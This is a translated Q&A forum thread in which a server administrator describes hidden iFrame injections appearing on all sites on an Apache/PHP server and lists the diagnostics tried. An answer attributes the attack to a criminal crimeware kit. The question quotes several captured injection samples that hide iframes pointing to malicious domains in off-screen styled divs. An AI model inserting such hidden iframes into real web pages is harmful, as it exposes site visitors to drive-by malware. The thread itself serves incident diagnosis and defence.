security - iFrame 注入(inject)攻击跟踪我们到新服务器

Question

几个月前，一个隐藏的 iFrame 开始出现在我们专用服务器上每个站点的每个页面上。当我们使用 503 将站点关闭进行维护时，iFrame 仍然在关闭维护页面上。最终，宿主封锁了 iFrame 的来源，但我们始终没有找到后门。注入(inject)的 iFrame 看起来像这样，但包裹在样式标签中以进行混淆并带有各种 URL:

iframe src="http://heusnsy.nl/32283947.html..

我们将较小的站点移到了不同​​的主机上，它们都很好。

我们将主站点移至同一主机上的新专用服务器，尽管我们努力锁定服务器 - 防火墙、限制访问、软件更新、检查每个文件 - iFrame 返回。

我们到处寻找它是如何进入的——配置文件、htaccess——但找不到它。

知道隐藏的 iFrame 注入(inject)漏洞在哪里吗？

编辑:以下是更多详细信息:运行 Apache 和 PHP 的 Linux 机器。一切的最新版本。注入(inject)的代码如下所示:

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

更新:以下是更多信息和我们学到的知识:

主机:Station CentOS Linux 6.3 - x86_64 上的 Linux 2.6.32-279.5.1.el6.x86_64/Apache 版本 2.2.15 - PHP 5.3.3 (cli)(构建时间:2012 年 7 月 3 日 16:53:21)

1. 服务器本身没有受到损害。

2. 包括 (apache/php) 在内的所有服务都已升级到我们系统可用的最新版本。

3. 没有帐户(ftp 或其他方式)受到损害。

4. 恶意软件会同时更改多个受感染网站的目标 URL (iframe src=)。 (由 unmaskparasites.com 提供)

5. 在更改 src 目标期间，没有执行/运行流氓或隐藏进程。

6. TCPDUMP 在离开端口 80 tcp 时获取了恶意软件的代码，但在接收恶意软件的用户的 GET 请求中没有发现任何异常 - 在相应的 apache 访问日志中也没有发现异常。

7. 在 iFrame 的 src url 地址切换期间，网站文件或 httpd/php 二进制文件未以任何方式更改 - 由 md5sum 检查提供。

8. 在更改期间，未在已知服务的已知端口上建立恶意连接。防火墙负责其余的工作。

9. rkhunter 和 maldet 没有得出任何结果。

10. 恶意软件 iFrame 在第一个 "</script>" 之后立即被触发和注入(inject)在此服务器上的所有帐户和网站上，任何具有此标签的页面上的标签。

11. 恶意软件被注入(inject)到静态页面和没有数据库连接的网站上。 (页面有<head> </script></head>标签就够了)

12. 没有安装流氓 apache 模块或 php 模块(不包括 mycript.so)。大多数默认的 apache 模块已暂停并被注释掉。

13. 恶意软件不会一直存在。它来来去去，有时会关闭几个小时，然后为多个用户出现并再次熄灭。使其极难追踪。

14. 我们网站上运行的 100% 的 php 代码和大部分 javascript 代码(phpmyadmin 代码除外)都是自定义编码的。唯一没有的是 Jquery 库。

服务器是高流量机器，在日志中搜索/匹配非常慢。每周访问日志可以超过 15GB。

情况就是这样……这不再是帐户被盗、文件被黑、恶意脚本的问题。这超出了我们目前所见，原因隐藏在 apache/php 本身的某处。 (至少这是我们的想法)。非常感谢任何帮助或想法。

以下是 iFrame 注入(inject)的示例:

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div>
document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

Answer 1

检查一下...劫持您的服务器的程序的恶作剧作者被称为“Left4Dead”——他的 iframe 注入(inject) doo-hicky 被称为“BlackLeech”。您可以在 Damagelab .org(CRIMINAL FORUM!!)上找到这位先生和他的广告。

每次 root 登录时，恶意软件都会停止所有事件，或者如果您通过 SSH 连接到您的服务器。它还监控系统监控工具:|

Damagelab .org 广告的屏幕截图:

http://imgur.com/NRQQl

作者的恶意软件广告文本:

http://pastebin.com/u7AcYSNi

notice how your thread is listed as a reference :))

if you need help with translation, hit me up!